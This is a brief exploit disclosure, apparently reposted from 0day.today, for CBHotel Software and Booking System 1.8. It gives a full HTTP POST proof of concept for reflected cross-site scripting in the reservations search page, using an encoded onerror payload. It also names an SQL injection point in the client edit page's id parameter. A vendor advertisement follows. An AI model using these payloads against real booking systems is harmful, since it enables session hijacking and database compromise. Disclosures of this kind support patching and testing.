CBHotel Software and Booking System 1.8 - Multiple Vulnerabilities found in Cross Site Scripting and SQL Injectio
*Cross Site Scripting:*
Archivos Afectados Afectados
http://localhost/cbadm/reservations/index.php?ac=search
-------------------------------------------------------------------
PoC:
*Cross Site Scripting Post.*
URL: http://server/cbadm/reservations/index.php?ac=search
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0 AlexaToolbar/alxf-2.18
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.cbhotel.eu/cbadm/adm_main.php
Cookie: PHPSESSID=flp86mf2huj240qp6hj34ojgp3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
-------------------------------------------------------------------
s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok
-------------------------------------------------------------------
*SQL Injection*
http://localhost/cbadm/clients/edit_client.php?id=1(SQL Injection)
# 0day.today [2018-01-02] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo